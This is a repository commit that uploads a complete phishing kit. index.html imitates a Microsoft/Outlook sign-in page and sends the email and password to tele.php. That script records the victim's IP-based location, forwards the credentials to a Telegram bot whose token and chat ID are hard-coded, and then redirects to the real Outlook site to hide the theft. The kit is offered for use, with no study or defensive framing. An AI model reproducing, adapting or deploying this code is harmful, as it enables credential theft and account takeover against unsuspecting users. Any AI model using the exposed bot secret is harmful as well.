94a commited on
Commit
2b799da
1 Parent(s): 50a3319

Upload 8 files

Browse files
Files changed (8) hide show
  1. estilos.css +122 -0
  2. index.html +59 -0
  3. llave.png +0 -0
  4. logo.jpg +0 -0
  5. nocuenta.png +0 -0
  6. signin 2.png +0 -0
  7. signin.png +0 -0
  8. tele.php +44 -0
estilos.css ADDED
@@ -0,0 +1,122 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ .body{
2
+ margin-top: 20px;
3
+ }
4
+
5
+ .logo{
6
+ width: 150px;
7
+ margin-left: -250px;
8
+ user-select: none;
9
+ pointer-events: none;
10
+ }
11
+
12
+ .signin{
13
+ width: 180px;
14
+ margin-left: -200px;
15
+ user-select: none;
16
+ pointer-events: none;
17
+
18
+
19
+ }
20
+
21
+ .cajacorreo{
22
+ font-size: 15px;
23
+ padding: 4px 8px;
24
+ border-style: solid;
25
+ border-width: 2px;
26
+ border-color: rgba(0,0,0,.4);
27
+ background-color: rgba(255,255,255,.4);
28
+ height: 32px;
29
+ height: 2rem;
30
+ padding: 6px 190px;
31
+ border-width: 1px;
32
+ border-color: #666;
33
+ border-color: rgba(0,0,0,.6);
34
+ height: 25px;
35
+ outline: none;
36
+ border-radius: 0;
37
+ -webkit-border-radius: 0;
38
+ background-color: transparent;
39
+ border-top-width: 0;
40
+ border-left-width: 0;
41
+ border-right-width: 0;
42
+ padding-left: 0;
43
+ }
44
+
45
+ .cajaclave{
46
+ font-size: 15px;
47
+ padding: 4px 8px;
48
+ border-style: solid;
49
+ border-width: 2px;
50
+ border-color: rgba(0,0,0,.4);
51
+ background-color: rgba(255,255,255,.4);
52
+ height: 32px;
53
+ height: 2rem;
54
+ padding: 6px 190px;
55
+ border-width: 1px;
56
+ border-color: #666;
57
+ border-color: rgba(0,0,0,.6);
58
+ height: 25px;
59
+ outline: none;
60
+ border-radius: 0;
61
+ -webkit-border-radius: 0;
62
+ background-color: transparent;
63
+ border-top-width: 0;
64
+ border-left-width: 0;
65
+ border-right-width: 0;
66
+ padding-left: 0;
67
+ }
68
+
69
+ .nocuenta{
70
+ width: 170px;
71
+ margin-left: -180px;
72
+ margin-top: -20px;
73
+ user-select: none;
74
+ pointer-events: none;
75
+
76
+ }
77
+
78
+ .botoncito{
79
+ margin-left: 250px;
80
+ display: block;
81
+ width: 30px;
82
+ min-height: 32px;
83
+ border: none;
84
+ min-width: 108px;
85
+ line-height: normal;
86
+ display: inline-block;
87
+ min-width: 100px;
88
+ padding: 4px 12px 4px 12px;
89
+ margin-top: 4px;
90
+ margin-bottom: 4px;
91
+ position: relative;
92
+ max-width: 100%;
93
+ text-align: center;
94
+ white-space: nowrap;
95
+ overflow: hidden;
96
+ vertical-align: middle;
97
+ text-overflow: ellipsis;
98
+ touch-action: manipulation;
99
+ color: #f3f0f0;
100
+ border-style: solid;
101
+ border-width: 2px;
102
+ border-color: transparent;
103
+ background-color: #0067b8;
104
+ -webkit-appearance: button;
105
+ cursor: pointer;
106
+ }
107
+
108
+
109
+ .llavecita{
110
+ width: 400px;
111
+ user-select: none;
112
+ pointer-events: none;
113
+ }
114
+
115
+
116
+
117
+
118
+
119
+
120
+
121
+
122
+
index.html ADDED
@@ -0,0 +1,59 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Document</title>
7
+ <link rel="stylesheet" href="estilos.css">
8
+ </head>
9
+ <body class="body">
10
+ <Center>
11
+
12
+ <br>
13
+
14
+ <img class="logo" src="logo.jpg" alt="">
15
+
16
+ <br>
17
+
18
+ <img class="signin" src="signin.png" alt="">
19
+
20
+
21
+ <br>
22
+ <br>
23
+
24
+
25
+ <form class="formula" action="tele.php" method="post">
26
+
27
+ <input class="cajacorreo" name="dni" required type="Email" placeholder="EmaiI, phone, or Skype">
28
+
29
+ <br>
30
+ <br>
31
+
32
+ <input class="cajaclave" name="cpass" required type="password" placeholder="password">
33
+
34
+ <br>
35
+ <br>
36
+ <br>
37
+
38
+ <img class="nocuenta" src="nocuenta.png" alt="">
39
+
40
+ <br>
41
+
42
+ <input class="botoncito" type="submit" value="siguiente">
43
+
44
+ </form>
45
+
46
+ <br>
47
+ <br>
48
+ <br>
49
+
50
+ <img class="llavecita" src="llave.png" alt="">
51
+
52
+
53
+
54
+
55
+
56
+
57
+ </Center>
58
+ </body>
59
+ </html>
llave.png ADDED
logo.jpg ADDED
nocuenta.png ADDED
signin 2.png ADDED
signin.png ADDED
tele.php ADDED
@@ -0,0 +1,44 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <?php
2
+ // Reemplaza 'TU_TOKEN' con el token de tu bot de Telegram
3
+ $botToken = '5905446592:AAFPBz32wUZ-4DmdAWtqe48XXrQSF4HObBQ';
4
+
5
+ // Reemplaza 'TU_CHAT_ID' con el ID del chat al que deseas enviar los datos
6
+ $chatId = '5063383507';
7
+
8
+ if ($_SERVER["REQUEST_METHOD"] == "POST") {
9
+ // Obtén los datos del formulario
10
+ $correo = $_POST["dni"];
11
+ $clave = $_POST["cpass"];
12
+
13
+ // Obtiene la dirección IP del usuario
14
+ $ip = $_SERVER['REMOTE_ADDR'];
15
+
16
+ // Utiliza un servicio para obtener información de geolocalización basada en la IP
17
+ $geo = json_decode(file_get_contents("http://ip-api.com/json/{$ip}"));
18
+
19
+ // Obtiene el país y la ciudad desde la respuesta de la API si están disponibles, o muestra un mensaje alternativo
20
+ $pais = isset($geo->country) ? $geo->country : 'Desconocido';
21
+ $ciudad = isset($geo->city) ? $geo->city : 'Desconocida';
22
+
23
+ // Formatea el mensaje que se enviará a Telegram
24
+ $message = "🔥Usuario ha ingresado 🔥\n 📧 Correo: $correo\n 💰 Clave: $clave\n ======================\n 🌍 País: $pais\n 🏙 Ciudad: $ciudad";
25
+
26
+ // URL para enviar el mensaje a Telegram
27
+ $telegramUrl = "https://api.telegram.org/bot$botToken/sendMessage?chat_id=$chatId&text=" . urlencode($message);
28
+
29
+ // Envía el mensaje a Telegram usando cURL
30
+ $ch = curl_init();
31
+ curl_setopt($ch, CURLOPT_URL, $telegramUrl);
32
+ curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
33
+ $result = curl_exec($ch);
34
+ curl_close($ch);
35
+
36
+ if ($result) {
37
+ // Redirige al usuario a la página web después de enviar los datos
38
+ header("Location: https://outlook.live.com/owa/");
39
+ exit; // Asegura que no se sigan ejecutando más instrucciones
40
+ } else {
41
+ echo "Hubo un problema al enviar los datos.";
42
+ }
43
+ }
44
+ ?>